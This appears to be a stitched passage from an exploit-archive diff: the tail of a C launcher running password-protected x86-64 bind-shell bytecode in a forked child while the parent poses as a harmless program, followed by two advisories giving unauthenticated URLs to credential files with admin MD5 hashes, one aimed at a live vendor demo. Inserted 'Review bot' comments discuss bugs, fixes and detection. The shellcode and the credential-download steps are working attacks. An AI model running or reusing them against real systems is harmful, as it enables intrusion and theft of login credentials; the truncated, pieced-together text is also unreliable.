"\x0f\x05\x40\x88\xc7\x40\xb6\x03\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x89"
"\xc7\x48\x89\xc6\x48\x8d\x74\x24\xf0\x6a\x10\x5a\x0f\x05\x48\xb8"PASSWORD""
"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7\xe6"
"\x50\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x54\x5f\xb0\x3b\x0f\x05"
"\x48\x31\xff\x48\xf7\xe7\xe9\x58\xff\xff\xff";
//|========================== VOID SHELLCODE ===========================
void SHELLCODE()
{
// This part floods the registers to make sure the shellcode will always run
__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
"call CODE3"); //1st CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
}
//|========================== VOID printBytes ===========================
void printBytes()
{
printf("The CripSlick's code is %d Bytes Long\n",
strlen(CODE3)); //2nd CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
}
//|============================== Int main ================================
int main ()
{
// IMPORTANT> replace CODEX the "unsigned char" variable below
// > This needs to be done twice (for string count + code to use)
int pid = fork(); // fork start
if(pid == 0){ // pid always starts at 0
SHELLCODE(); // launch void SHELLCODE
// this is to represent a scenario where you bind to a good program
// you always want your shellcode to run first
}else if(pid > 0){ // pid will always be greater than 0 after the 1st process
// this argument will always be satisfied
printBytes(); // launch printBYTES
// pretend that this is the one the victim thinks he is only using
}
return 0; // satisfy int main
system("exit"); // keeps our shellcode a daemon
}
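Review bot: main() ends with unreachable, misdocumented control flow: `return 0;` comes before `system("exit");`, so the call commented as "keeps our shellcode a daemon" never executes; the forked child lives on only because the parent returns while the child is still inside `call CODE3`. Remove the dead `system()` call or place the intended daemon logic before the return, and handle `fork()` returning -1 (the comment "pid always starts at 0" is wrong: 0 means child, >0 parent, -1 failure). The file also depends on implicit declarations, `fork()` without `<unistd.h>` and `system()` without `<stdlib.h>`, which recent GCC releases reject outright; `strlen(CODE3)` passes an `unsigned char *` where `const char *` is expected and prints the `size_t` result with `%d` (use `%zu`), and the byte count is only meaningful because the payload is NUL-free, which the comment should say since that is what the check actually verifies. Because `call CODE3` jumps into a writable `.data` array, the "Tested on" header should record the build flags used, as a default toolchain maps that region non-executable. Typos in the header comments to fix before publishing: "CHOSE" (CHOOSE), "completly", "immediatly", "leaned" (learned), "COD2".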
1730
platforms/multiple/remote/40125.py
Executable file
File diff suppressed because it is too large
13
platforms/php/webapps/40126.txt
Executable file
@ -0,0 +1,13 @@
# Exploit Title: Free News Script User Password Download File
# Date: 2016-07-18
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.newsp.eu/index.php?pt=ns
# Version: All Version
# Download Link : http://www.newsp.eu/newsp.zip
Exploit :
http://site/admin/user.txt
Admin|e3afed0047b08059d0fada10f400c1e5|1|1|1|1|
Username = Admin
Password Hash = e3afed0047b08059d0fada10f400c1e5 [MD5]
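Review bot: the advisory states the root cause, a credential file at `admin/user.txt` that the web server hands to any unauthenticated client, but gives no remediation, and "Version: All Version" is asserted without naming the version actually tested; add the tested version(s) and the vendor-notification status. The fix worth recording next to the finding is that the credential store must sit outside the document root, or the web server must deny direct requests to it; on the detection side, a GET for `/admin/user.txt` from an unauthenticated source in the access log is a clean indicator that this exposure is being probed.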
16
platforms/php/webapps/40127.txt
Executable file
@ -0,0 +1,16 @@
# Exploit Title: PHP calendar script Password Download File
# Date: 2016-07-18
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.newsp.eu/calendarscript.php?pt=st
# Version: All Version
# Download Link : http://www.newsp.eu/calendar.zip
Exploit :
http://site/user.txt
Admin|fe01ce2a7fbac8fafaed7c982a04e229
Password Hash = fe01ce2a7fbac8fafaed7c982a04e229 (demo)[MD5]
Test :
Exploit : http://www.newsp.eu/demo/user.txt
Login Url : http://www.newsp.eu/demo/login.php
Password : demo
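Review bot: the lines `Admin|fe01ce2a7fbac8fafaed7c982a04e229` and `Password Hash = fe01ce2a7fbac8fafaed7c982a04e229 (demo)[MD5]` show a second weakness the advisory does not name: the stored credential is an unsalted MD5 digest, and the "Test" block ties it directly to the literal password `demo`, so once the file is exposed a guessed password can be verified offline. The remediation therefore needs both parts, keeping `user.txt` out of the webroot and replacing MD5 with a salted, slow hash (PHP's `password_hash()`). The "Test" section points at the vendor's live demo instance; state whether the vendor was informed before publication.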